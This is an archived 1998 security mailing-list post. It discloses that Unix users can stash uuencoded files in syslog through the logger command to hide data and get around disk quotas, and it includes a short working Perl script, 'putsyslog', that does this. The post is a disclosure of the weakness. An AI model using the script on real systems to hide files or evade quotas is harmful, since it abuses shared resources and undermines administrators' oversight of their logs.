putsyslog.txt

`  
[ http://www.rootshell.com/ ]  
  
From [email protected] Wed Jul 8 10:18:27 1998  
Date: Wed, 8 Jul 1998 19:08:41 +0200  
From: Paul Boehm <[email protected]>  
To: [email protected]  
Subject: putsyslog  
  
hi,  
  
users can write messages to syslog and thus hide files in there and  
bypass quotas.. later they can extract it if they have read access  
to the logfile. i already wrote a perl script that puts an uuencoded   
file in syslog... but now im too lazy to write a script/program to   
extract it.. anyway, here's putsyslog:  
  
--snip--  
#!/usr/bin/perl  
#Putsyslog - puts a file in syslog using logger and uuencode  
# maybe i'll write a getsyslog someday.. but rather not  
#  
# [email protected]  
  
$file = shift || "file";  
$loglevel = shift || "daemon.info"; # something that goes  
# to a pub readable  
# logfile  
open(UU,"uuencode $file $file |");  
  
while (<UU>) {  
chomp;  
s/\\/\\\\/g;  
s/\"/\\"/g;  
s/\'/\\'/g;  
s/\`/\\`/g;  
system("logger -p $loglevel \"[PUTFILE] $file $_\"\n");  
}  
  
close(UU);  
  
print "done logging $file to $loglevel\n";  
--snip--  
  
--   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Name: Paul S. Boehm || Freelance Security Consultant.  
Email: [email protected] || PGPkey available at:  
Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
There is is no reason for any individual to have a computer in their home.  
--Ken Olsen (Digital Corp CEO) 1977.  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
`